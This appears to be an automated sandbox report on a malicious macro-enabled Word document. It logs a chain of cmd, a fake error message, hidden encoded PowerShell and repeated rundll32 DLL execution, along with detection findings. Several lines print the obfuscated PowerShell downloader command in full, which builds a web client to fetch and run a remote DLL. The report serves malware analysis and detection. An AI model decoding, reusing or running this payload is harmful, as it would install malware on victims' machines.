ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: <ystem.pdbF source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2139174857.0000000002380000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2139955069.00000000029F7000.00000004.00000040.sdmp

Source: DAT.doc

Initial sample: OLE summary subject = Investment Account Garden, Books & Automotive Sleek Planner Ergonomic Cotton Bacon Agent Profound Wooden Enhanced Tasty Gorgeous Soft Shirt end-to-end Estate Russian Ruble

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: DAT.doc	Stream path 'Macros/VBA/Dwztpwkmgv8q9o28r' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Dwztpwkmgv8q9o28r			Name: Dwztpwkmgv8q9o28r

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6AD